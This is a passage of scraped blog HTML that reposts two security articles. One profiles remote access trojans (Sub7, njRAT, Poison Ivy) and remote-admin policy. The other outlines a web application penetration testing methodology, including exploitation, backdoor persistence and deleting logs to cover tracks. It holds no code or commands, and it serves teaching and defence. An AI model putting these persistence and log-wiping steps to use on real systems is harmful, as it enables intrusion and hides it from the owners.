<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
On the client-side the software had an “address book” that allowed the controller to know when the target computers are online. Additionally the server program could be customized before being delivered by a so-called server editor. A major incident related with Sub7 is that a hacker distributed a mail as that tricked the users to download the RAT and made them compromised.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>njRAT</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The remote access Trojan is thorough in its data-stealing capabilities. Beyond dropping a key logger, variants are capable of accessing a computer’s camera, stealing credentials stored in browsers, opening reverse shells, stealing files, manipulating processes and viewing the user’s desktop.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces3.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces3.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The malware is delivered via spear phishing emails, or drive-by <a href="http://resources.infosecinstitute.com/downloads/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="downloads">downloads</a>. The attackers are also embedding the malware in other applications such as the L517 Word List Generator; the malware is compressed and obfuscated by a number of tools in order to avoid detection by security software.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Once a victim is infected, the malware is also capable of scanning for other machines on the same network looking for other vulnerable machines to infect. Using that ability to move once inside a network coupled with the legitimate credentials and other data it harvests via its key logging capabilities, njRAT is a classic APT-style attack tool.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The malware stores keystrokes in a .tmp file and connects to a control server over port 1177 registered to an IP address in Gaza City, Palestine. A copy of the malware is stored in a second directory built by the attacker in order for it to execute again upon reboots. Once it connects to the command and control server, it sends system information including the computer name, attacker identifier, system location, operating system information, whether the computer contains a built-in camera, and which windows are open.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>PoisonIvy</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Poison Ivy is a remote access tool that include features common to most Windows-based RATs, including key logging; screen capturing, video capturing, file transfers, system administration, password theft, and traffic relaying.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The Poison Ivy builder kit allows attackers to customize and build their own PIVY server, which is delivered as mobile code to a target that has been compromised, typically using social engineering. Once the server executes on a compromised machine, it connects to a PIVY client installed on the attacker’s machine, giving the attacker control of the compromised system.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In 2011, attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system. Same year, PIVY also played a key role in the campaign known as Nitro that targeted chemical makers, government agencies, defense contractors, and human rights groups. Just recently, PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a “strategic web compromise” attack against visitors to a U.S. government website and a variety of others.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Poison Ivy uses TCP for communication and it is encrypted using Camellia cipher using a 256 key. The key is made from a password created by the attacker while the PIVY server is built.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Many hacker groups used PoisonIvy to attack different category of targets across the world. These include a group called admin@338, which specializes in attacks targeting the financial services industry; th3bug focused on universities and healthcare facilities since 2009. The hacker group menuPass has run cyber-espionage attacks against defense contractors over the last four years</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0942_RemoteAcces4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Organizational policy requirements for RAT</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Remote Administration Tools provide a great assist in IT related works in organizational level. Staff from remote locations can access the computer and can work as if on the same location. These are the organizational level policy requirement for using Remote Administration Tools.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>All remote access tools that allow communication to and from the Internet must require multi-factor authentication.</li>
<li>The Remote Administration Tools authentication database source should be of AD or LDAP, and the authentication protocol must involve a challenge-response protocol.</li>
<li>Remote access tools must support the application layer proxy rather than direct connections through the perimeter firewall.</li>
<li>It should support strong, end-to-end encryption of the remote access communication channels as specified in the network encryption protocols policy.</li>
<li>All antivirus, data loss prevention, and other security systems must not be disabled, interfered with, or circumvented in any way.</li>
<li>Remote Administration Tools must be procured through the standard procurement process, and the IT group must approve the purchase.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Reference</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 14pt;">
<li>http://www.matasano.com/research/PEST-CONTROL.pdf</li>
<li>http://cgi.di.uoa.gr/~ad/Publications/SPE-08.pdf</li>
<li>http://www.itnews.com/business-process-management/73683/5-alternatives-logmein-free-remote-pc-access?page=0,1&source=ITNEWSNLE_nlt_itndaily_2014-01-28</li>
<li>http://www.fidelissecurity.com/files/files/FTA_1009-njRAT_Uncovered_rev2.pdf</li>
<li>http://www.fireeye.com/resources/pdfs/fireeye-poison-ivy-report.pdf</li>
<li>http://www.ittoday.info/AIMS/DSM/84-02-02.pdf</li>
</ul>
<span style="color: #747474; font-family: PT Sans, Arial, Helvetica, sans-serif; font-size: x-small;"><span style="line-height: 20px;"><a href="http://resources.infosecinstitute.com/remote-access-tool/" target="_blank">http://resources.infosecinstitute.com/remote-access-tool/</a></span></span>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-5427596336876071332014-04-28T21:32:00.003-07:002014-04-28T21:32:32.805-07:00[infosecinstitute] Step by Step Guide to Application Security Penetration Testing<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Introduction</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This document will guide you to penetrate web applications step by step. We have followed OWASP (Open Web Application Security Project) and OSSTM (Open Source Security Testing Methodologies) to construct this article.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Objective</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The objective of this article is to help the Security Analyst/Penetration Testers/Developers/Ethical Hackers to follow a step by step penetration testing process, discover the vulnerability, and exploit and mitigate the same.</div>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Web Application Penetration Testing</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The penetration test emulates what a malicious attacker with bad intentions would harm while they are penetrating the application. This is a test of people, systems and processes that are in place to detect, prevent, and respond to these kinds of attacks.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG1.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG1.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
A Web Application Penetration Test includes the vulnerabilities that are discovered using the information gathering process, with the exploitation (if applicable), and the level of access and success the penetration tester was able to achieve.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Below are the for steps penetration testing process:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Discover vulnerable systems using automated and manual vulnerability discovery.</li>
<li>Conduct real world attack simulation.</li>
<li>Mitigate threats and secure the platform.</li>
</ul>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Web Application Vulnerability Assessment</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; padding-left: 30px;">
The Web Application Vulnerability Assessment does not include the exploitation phase. It contains the list of vulnerabilities, including the severity and the impact of the vulnerability on the application, along with the recommendations to resolve the same.<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG2.jpg" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG2.jpg" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Web Application Audit</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
A Web Application Audit is a more in-depth view at the environment and processes, such as the backend server, database, secure code review, session management, authorization, and DMZ configuration.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG3.jpg" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG3.jpg" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
It contains all the aspects of web application penetration testing and vulnerability assessment, including the below four phases.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Source Audit</li>
<li>Data Audit</li>
<li>Architecture Audit</li>
<li>Performance Audit</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Please refer the above diagram for the classification of the four phases.</div>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Steps to start with the Test</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
To start with the Web Application Audit, we need to follow the below steps:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Scoping of the Application</li>
<li>Checking for static and dynamic pages</li>
<li>Documenting number of logins and role of the users</li>
<li>Information Gathering</li>
<li>Threat Profiling</li>
<li>Make a list of all possible threats.</li>
<li>Comprehensive tests according to the created threat profile</li>
<li>Report</li>
<li>Report Creation</li>
<li>Internal Verification</li>
<li>Report Submission</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The testing will be conducted in two phases.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Automated Test</li>
<li>Using Commercial tools available on the internet. i.e. Acunetix WVS, Netsparker.</li>
<li>Manual Test</li>
<li>Using manual testing tools like Burp Suite, <a href="http://resources.infosecinstitute.com/owasp-zap/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="OWASP ZAP">OWASP ZAP</a> Proxy</li>
<li>Burp Suite – Intruder, repeater, sequencer, spider used in the manual test.</li>
</ul>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Approach to the Web Application Penetration Test</h3>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Passive Approach</li>
<li>Understand the logic of the application</li>
<li>Information Gathering</li>
<li>Understand all the access points of the application</li>
<li>Active Approach</li>
<li>Configuration Management Testing.</li>
<li>SSL/TLS Testing</li>
<li>Testing for file extensions</li>
<li>Old, backup and unreferenced files</li>
<li>Testing for HTTP methods</li>
<li>Business Logic Testing</li>
<li>Testing for the business logic of the application</li>
<li>Testing for XSS</li>
<li>Testing for SQLi</li>
<li>Authentication Testing</li>
<li>Credentials transport over an encrypted channel- Check for SSL(https)</li>
<li>Testing for Guessable User Account</li>
<li>Brute Force Testing</li>
<li>Testing for bypassing authentication schema</li>
<li>Testing for vulnerable remember password and password reset</li>
<li>Testing for Logout and Browser Cache Management</li>
<li>Testing for CAPTCHA</li>
<li>Testing Multiple Factors Authentication</li>
<li>Authorization Testing</li>
<li>Authorization Testing</li>
<li>Testing for bypassing authorization schema</li>
<li>Testing for Privilege Escalation</li>
<li>Session Management Testing</li>
<li>Testing for Session Management Schema</li>
<li>Testing for Cookies attributes- http only, secure and time validity</li>
<li>Testing for Session Fixation</li>
<li>Testing for CSRF</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>The Scoping of the Application</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Once the penetration tester has the URL/IP address of the application, he will start working on the scoping of the application. It generally includes the following things.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Gathering client requirements</li>
<li>Preparing a test plan</li>
<li>Profiling test boundaries</li>
<li>Defining Business objectives</li>
<li>Nature and behavior of the application</li>
<li>Describe each factor that builds a practical roadmap towards test execution</li>
<li>Test constraints</li>
<li>Types of testing</li>
<li>White Box</li>
<li>Provided with the complete knowledge of application/server and database along with the business logic of the application</li>
<li>Gray Box</li>
<li>Provided with the partial knowledge of the application/server</li>
<li>Privilege escalation may come under this</li>
<li>Black Box</li>
<li>Zero Knowledge Approach</li>
<li>An only thing that is provided to penetration tester is IP address/URL of the application</li>
<li>Need extra ordinary skills to exploit</li>
<li>Project management and scheduling</li>
<li>Limitations</li>
<li>Need of additional information</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Check for the static and dynamic pages</strong></div>
<div style="background-color: #ceecf5; border: 1px solid; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; line-height: 20px; margin: 20px 0px 25px; padding-left: 25px; padding-right: 25px;">
<strong>Want to learn more?? </strong>The InfoSec Institute <a href="http://www.infosecinstitute.com/find_out_pricing_wapt.html" style="color: rgb(51, 51, 51) !important; text-decoration: none;">Web Application Penetration Testing Boot Camp</a>focuses on preparing you for the real world of Web App Pen Testing through extensive lab exercises, thought provoking lectures led by an expert instructor. We review of the entire body of knowledge as it pertains to web application pen testing through a high-energy seminar approach.<br /><br />The Web Application Penetration Testing course from InfoSec Institute is a totally hands-on learning experience. From the first day to the last day, you will learn the ins and outs of Web App Pen Testing by attending thought provoking lectures led by an expert instructor. Every lecture is directly followed up by a comprehensive lab exercise (we also set up and provide lab workstations so you don't waste valuable class time installing tools and apps). Benefits to you are:<br /><br /><ul>
<li><b>Get <a href="http://www.iacertification.org/cwapt_certified_web_app_penetration_tester.html" style="color: rgb(51, 51, 51) !important; text-decoration: none;">CWAPT Certified</a></b></li>
<li>Learn the Secrets of Web App Pen Testing in a totally hands-on classroom environment</li>
<li>Learn how to exploit and defend real-world web apps: <b>not just silly sample code</b></li>
<li>Complete the 83 Step "Web App Pen Test Methodology", and bring a copy back to work with you</li>
<li>Learn how perform OWASP Top 10 Assessments: for PCI DSS compliance</li>
</ul>
<center>
<div class="btn" style="padding: 0px 0px 14px 10px;">
<a href="http://www.infosecinstitute.com/find_out_pricing_wapt.html" style="background-image: url(http://www.infosecinstitute.com/images/btn_green.png); background-repeat: no-repeat no-repeat; color: white; display: block; font-size: 17px; font-weight: bold; height: 33px; padding: 10px 0px 0px; text-decoration: none; text-shadow: rgb(33, 77, 30) 1px 1px 1px; width: 240px;">VIEW WEB APP PEN TEST</a></div>
</center>
</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li><span style="text-decoration: underline;">Static page</span>- Page created with HTML that remains the same all the time.</li>
<li><span style="text-decoration: underline;">Dynamic page</span>- It is a functional page that is generally connected with the database. For example, a login page.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Documenting number of logins and role of the users</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
Once the penetration tester has an idea about the scoping, static and dynamic pages, he will move on to analyze the number of logins and the types of users that can login to the particular application. If he is already provided with the list of usernames and passwords, it is a case of white box testing. If not, it will come under black box testing.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Information Gathering</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
In this phase, a penetration tester collects as much information as he can about the target.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
Below is the check list for information gathering.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 41pt;">
<li>Spider, Robots and Crawlers</li>
<li>Search Engine Discovery</li>
<li>Testing Web Application Fingerprint</li>
<li>Application Discovery</li>
<li>Analysis of Error Codes</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Real time example-</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Let us assume I am working on a penetration testing project. My boss came to me and handed me a piece of paper saying that I have spoken to the CIO of the client and we have to start the penetration testing for the company Nous Infosystems. The legal department will be sending you all the documents and confirmation of the authorization. It’s a company you’ve never heard of before.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
What now?</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The information gathering starts from right here.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Threat Profiling</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
To ensure the comprehensive testing, it is a very good idea to start with a Threat Profile. A threat is simply the goal of your target. A Threat Profile is a comprehensive list of the threats that are relevant to that application.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
These are expressed in terms of security threats.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
List out all the possible threats that may harm the web application according to the business logic of the application.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
A module-based threat profile should be created for the comprehensive penetration test.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
For example:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 41pt;">
<li>Threat profile for public module</li>
<li>Threat profile for login module</li>
<li>Threat profile for password change module</li>
<li>Threat profile for logout module</li>
<li>Threat profile for business rule escalation module</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Tests according to the threat profile</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
The threat profile is the key weapon of any attacker. Following the threat profile step by step can lead to discovery of very high and critical vulnerabilities.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Exploitation</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
Exploitation is the process of gaining control over a system.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
End Goal: administrative-level access to the target.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
During the penetration testing process, if a pen tester discovers a critical vulnerability that has an exploit or that can be exploited using our own scripts/code, he can use the <strong>Metasploit Framework</strong> to exploit the target or to develop his own exploit.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Prerequisite:</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 72pt;">
<li>Scanning of the target.</li>
<li>Vulnerabilities found in the scanning phase.</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Steps involved:</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 72pt;">
<li>Check for the service/version running on the particular port.</li>
<li>Search the vulnerability in the service/version.</li>
<li>Exploit the target using tools like Metasploit..</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
<strong>Covering tracks and maintaining access:</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; margin-left: 5pt;">
Once exploitation has been done successfully, there are two ways to maintain the access.</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 72pt;">
<li>Using Backdoors</li>
<li>Using Rootkits</li>
<li>For Example: Netcat, NetBus</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Covering the Tracks</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Destroying the evidence of presence and activities.</li>
<li><div>
Log files contain the information of every activity that has been done on a computer, so it is very important to remove this log file. There are different ways to remove log files on Windows, Linux and MAC</div>
<div style="margin-bottom: 20px; margin-left: 5pt;">
<strong>Reporting</strong></div>
<div style="margin-bottom: 20px; margin-left: 5pt;">
A penetration testing report should contain</div>
<ul style="margin-left: 43pt;">
<li>An executive summary.</li>
<li>Detailed description of the vulnerabilities.</li>
<li>Raw output.</li>
</ul>
<div style="margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/042414_0940_StepbyStepG4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px;">
Below is the elaborated process of writing a penetration testing process.</div>
<ul>
<li>Executive Summary</li>
<li>Scope</li>
<li>Overall Assessment</li>
<li>Key Vulnerabilities Discovered</li>
<li>Graphical representation of OWASP top 10</li>
<li>Key Findings and Action Items</li>
<li>Observations</li>
<li>Recommended Action Plan</li>
<li>Interpretation of Ratings</li>
<li>Threat Profile</li>
<li>Tools used (Optional)</li>
<li>Result of test cases</li>
<li>Guidelines for Developers</li>
</ul>
</li>
</ul>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
Conclusion</h3>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
A successful web application penetration test can be executed by following OWASP and OSSTM. Both are open source security testing methodologies. By reading this article you should have a great idea about how a web application penetrating test actually works. This article does not include the entire process of the WAPT, rather than it can be used as a reference document. For the most common and top vulnerabilities, refer to:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-left: 43pt;">
<li>OWSAP TOP 10</li>
<li>SANS TOP 25</li>
<li>OSSTM (Open Source Security Testing Methodology)</li>
</ul>
<h3 style="background-color: white; color: rgb(51, 51, 51) !important; font-family: 'Antic Slab', Arial, Helvetica, sans-serif !important; font-size: 16px !important; font-weight: normal; line-height: 24px !important;">
References</h3>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li><a href="https://www.owasp.org/index.php/Main_Page" style="color: rgb(51, 51, 51) !important; text-decoration: none;">https://www.owasp.org/index.php/Main_Page</a></li>
<li><a href="http://www.isecom.org/research/osstmm.html" style="color: rgb(51, 51, 51) !important; text-decoration: none;">http://www.isecom.org/research/osstmm.html</a></li>
<li><a href="http://www.sans.org/" style="color: rgb(51, 51, 51) !important; text-decoration: none;">http://www.sans.org/</a></li>
</ul>
